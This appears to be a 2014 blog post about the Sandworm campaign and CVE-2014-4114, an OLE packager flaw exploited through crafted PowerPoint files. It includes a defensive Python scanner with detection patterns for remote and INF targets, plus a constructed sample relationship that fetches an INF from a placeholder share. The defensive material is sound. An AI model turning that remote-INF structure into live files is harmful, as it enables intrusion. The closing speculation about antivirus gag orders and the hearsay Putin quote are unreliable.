Every supported Windows version (XP, which is out of support, is not on the affected list) has a zero-day vulnerability that gives an attacker full control of your Windows computer, and with it everything on the machine: credit card numbers, passwords and system information.
All it takes is opening a crafted attachment; once you do, your system can be completely taken over (you do have to open that file yourself).
The threat-intelligence firm iSIGHT Partners identified the vulnerability and named the group using it Sandworm; that is iSIGHT's name for it, not Microsoft's. F-Secure had earlier seen parts of the same activity and called the group Quedagh.
F-Secure did not identify it as a Windows zero-day exploit. The boring official name for the vulnerability is CVE-2014-4114.
We know that these hackers use proxy servers to reroute their internet traffic.
The emphasis is on who is using it to hack systems. So far this is what is known about the vulnerability:
- An exposed dangerous method vulnerability exists in the OLE package manager in Microsoft Windows and Windows Server.
- It affects all client versions of Windows from Vista SP2 to Windows 8.1.
- It affects Windows Server 2008 and 2012.
- When exploited, the vulnerability allows an attacker to remotely execute arbitrary code.
- The vulnerability exists because Windows allows the OLE packager (packager.dll) to download and execute INF files. In the observed exploit, which used Microsoft PowerPoint files, the packager allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources.
- The referenced files are downloaded and, in the case of INF files, executed with specific commands.
- An attacker can exploit this to execute arbitrary code, but needs a specifically crafted file and social engineering (observed in this campaign) to convince a user to open it.
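How that description translates into something you can check on a suspicious attachment, as an added example that is not code from the original post, iSIGHT or F-Secure: the script below opens an Office Open XML file (a .pptx or .ppsx is a zip) and flags every OLE object relationship that points outside the package, at a remote path, or at an INF or executable file. It assumes the external reference is recorded the standard OOXML way (a relationship of type oleObject with TargetMode="External"); the post does not show the real sample's layout, and the two packages built inside the script, including the 192.0.2.10 share, are constructed for the demo.

```python
"""Flag OLE Package objects in an OOXML document that point outside the package.

Added example, not code from the original post, iSIGHT or F-Secure. It assumes
the external reference is recorded the standard OOXML way: a relationship part
(*/_rels/*.rels) whose Type is the oleObject relationship and whose TargetMode
is "External". The sample packages built below are constructed for the demo;
192.0.2.10 is a documentation address, not a real host.
"""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# A Package object's payload should live inside the zip (../embeddings/...).
# Anything reachable over the network, or anything the OLE packager would
# treat as an installable INF script, is what CVE-2014-4114 needs.
REMOTE_RE = re.compile(r"^(file:///?\\\\|\\\\|https?://|ftp://)", re.IGNORECASE)
DANGEROUS_EXT = (".inf", ".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1")


def external_ole_targets(package: bytes):
    """Return [(rels_part, target, reason), ...] for suspicious OLE relationships."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                reasons = []
                if rel.get("TargetMode", "Internal").lower() == "external":
                    reasons.append("external OLE target")
                if REMOTE_RE.match(target):
                    reasons.append("remote path")
                if target.lower().endswith(DANGEROUS_EXT):
                    reasons.append("INF/executable target")
                if reasons:
                    findings.append((name, target, ", ".join(reasons)))
    return findings


def build_sample_package(slide_rels: str) -> bytes:
    """Constructed minimal pptx-like zip: enough parts for the scanner, not a valid deck."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("ppt/slides/slide1.xml",
                   '<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        z.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels)
    return buf.getvalue()


# Normal embedded object: the payload is a part inside the package.
BENIGN_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="../embeddings/oleObject1.bin"/>'
    '</Relationships>'
)

# Constructed to mirror the shape described above: Package objects whose payload
# sits on a remote share, one of them an INF file the packager would run.
SUSPICIOUS_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
    'Target="file:///\\\\192.0.2.10\\public\\slide1.gif" TargetMode="External"/>'
    f'<Relationship Id="rId3" Type="{OLE_REL_TYPE}" '
    'Target="file:///\\\\192.0.2.10\\public\\slides.inf" TargetMode="External"/>'
    '</Relationships>'
)


def scan_path(path: str):
    """Scan an OOXML file on disk."""
    with open(path, "rb") as fh:
        return external_ole_targets(fh.read())


if __name__ == "__main__":
    if sys.argv[1:]:
        for p in sys.argv[1:]:
            for part, target, reason in scan_path(p):
                print(f"{p}: {part}: {target} [{reason}]")
    else:
        print("benign sample:", external_ole_targets(build_sample_package(BENIGN_RELS)))
        for part, target, reason in external_ole_targets(build_sample_package(SUSPICIOUS_RELS)):
            print(f"suspicious sample: {part}: {target} [{reason}]")
```

Run it with file paths to scan real attachments, or with no arguments to scan the two built-in samples. One caveat: a legitimate deck can link an OLE object to a network share, so treat an external target as a reason to look closer rather than proof of exploitation; the INF case is the one that matters for this vulnerability.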
iSIGHT attributes the attacks to the Russian government, and the targets are:
- Ukrainian government organizations
- Western European government organizations
- energy sector firms (specifically in Poland)
- European telecommunications firms
- a United States academic organization
The name Sandworm comes from the many references to Frank Herbert's Dune, in which sandworms play a vital role, that iSIGHT found in the attackers' tooling; it is not a worm in the computer-worm sense.
If you want the detailed report you can request it here.
Microsoft is working on a patch and on workarounds. Until those are available no further details will be given, in the name of security.
What you can do about it: do not open e-mail attachments from untrusted sources, and apply Microsoft's patches as soon as they ship (the fix for CVE-2014-4114 is bulletin MS14-060).
Symantec (Norton AV) has published information about this; interestingly, the well-renowned Russian Kaspersky Lab has not.
Where your AV provider comes from does matter. Symantec is a US company, Kaspersky a Russian one, and both are banned in China.
Instructions, with gag orders attached, not to detect "patriotic" viruses simply cannot be ruled out. In the name of national security, anything goes.
Running both should still be an option if one of the scans is run offline from a DVD (not tested); both Symantec and Kaspersky require the other to be removed before installation. Avira, being German, or the Czech Avast would be good alternatives.
Romanian Bitdefender seems to be winning all the tests these days.
Rumor has it that the Russians will not confirm their part in this cyber activity... but someone claims to have heard Putin say:
"Our intelligence agencies will continue to gather information about the intentions of governments -- as opposed to ordinary citizens -- around the world, in the same way that the intelligence services of every other nation does. We will not apologize simply because our services may be more effective."